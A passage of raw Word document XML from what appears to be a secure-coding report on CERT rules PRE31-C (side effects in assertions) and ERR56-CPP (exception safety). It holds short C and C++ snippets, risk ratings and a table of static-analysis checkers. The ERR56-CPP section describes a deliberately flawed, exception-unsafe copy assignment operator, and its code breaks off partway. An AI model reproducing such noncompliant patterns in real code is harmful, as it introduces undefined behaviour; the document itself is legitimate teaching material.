          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4355A8D3"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;assert.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="483A6C1C"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;stddef.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045256A0"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D1F38B"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>process(</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>index) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4278F6E9"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>assert</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(index &gt; 0); </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/* No side effect */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35A51333"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>++index;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18DE5B1B" w14:textId="77777777" w:rsidR="00AA1628" w:rsidRPr="00AA1628" w:rsidRDefault="00AA1628" w:rsidP="00AA1628">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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/* ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E312001" w14:textId="129A2DEF" w:rsidR="00F72634" w:rsidRPr="0021682A" w:rsidRDefault="00AA1628" w:rsidP="0021682A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>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6F617B3" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59F826BC" w14:textId="63083BA3" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(9) Use Effective Quality Assurance Techniques- </w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t xml:space="preserve">Incorporating good quality assurance techniques such as source code audits can help developers find issues such as the one presented in the noncompliant code where the </w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t>expression containing the side effect was programmed into the assertion.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0D0A59" w14:textId="3A94AF58" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r>
              <w:t>Architect and Design for Security Policies</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t xml:space="preserve"> It is </w:t>
            </w:r>
            <w:r w:rsidR="00D01753">
              <w:t>suggested that creating unsafe function-like macros should be avoided. If this is written into a security policy, this risk can be better avoided.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D6F9694" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05FDEF4C" w14:textId="788F6AD7" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D1FC84" w14:textId="72B02135" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D13FDB" w14:textId="63D2348F" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018B5741" w14:textId="170EC396" w:rsidR="00B475A1" w:rsidRDefault="00225E6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FC7EFDB" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Axivion Bauhaus Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1659F964" w14:textId="7D9EA646" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C127A7" w14:textId="625C907E" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CertC-PRE31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511AFF98" w14:textId="0F73F6CA" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="31776F75" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DD1CB55" w14:textId="0C1B127D" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ECLAIR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="147234E7" w14:textId="09ADE8C2" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B35F362" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CC2.EXP31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C643E28" w14:textId="61AFCAAE" w:rsidR="00225E6A" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CC2.PRE31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB1863C" w14:textId="3E02300C" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="70B30499" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DFBB62B" w14:textId="0E2EFCFE" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>LDRA tool suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C886138" w14:textId="6B350055" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270673C4" w14:textId="238691D9" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>9 S, 562 S, 572 S, 35 D, 1 Q</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D93F88D" w14:textId="52E9EFA1" w:rsidR="00B475A1" w:rsidRDefault="00225E6A"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45D90000" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Parasoft C/C++test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D5B7F9C" w14:textId="0B862561" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58BDF625" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CERT_CPRE31-b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EFB3E54" w14:textId="77777777" w:rsidR="00225E6A" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CERT_CPRE31-</w:t>
            </w:r>
            <w:r>
              <w:t>c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3B83A6" w14:textId="1D5BC990" w:rsidR="00225E6A" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT_CPRE31-</w:t>
            </w:r>
            <w:r>
              <w:t>d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08365A70" w14:textId="54003238" w:rsidR="00B475A1" w:rsidRDefault="00225E6A" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00225E6A">
              <w:t>Assertions should not contain assignments, increment, or decrement operators</w:t>
            </w:r>
            <w:r w:rsidRPr="00225E6A">
              <w:br/>
              <w:t>Assertions should not contain function calls nor function-like macro calls</w:t>
            </w:r>
            <w:r w:rsidRPr="00225E6A">
              <w:br/>
              <w:t>Avoid side effects in arguments to unsafe macros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798C548" w:rsidR="00381847" w:rsidRDefault="003521B3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ERR56-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7DF53768" w14:textId="41B46673" w:rsidR="00381847" w:rsidRDefault="003521B3">
            <w:r w:rsidRPr="003521B3">
              <w:t>Guarantee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FDA4F94" w:rsidR="00F72634" w:rsidRDefault="0021682A" w:rsidP="0015146B">
            <w:r>
              <w:t>There is a flawed copy assignment operator. If the new expression throws an exception, the function will have modified the state of each member variable violating the implicit invariants of the class. An object in an indeterminate state and if there is an operation on it (including destruction), it will result in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5462E7B8"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstring&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7160500A"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EB7371"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>IntArray {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B8676D"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b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*array;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A64B555"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std::</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>nElems;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="048D7DEF"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4324FDA2"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8200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D231873"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466DE37F"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~IntArray() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00BD5263"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[] array;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A0E4BDF"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118194CA"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3335C241"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306A0C49"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IntArray(</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>IntArray&amp; that); </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
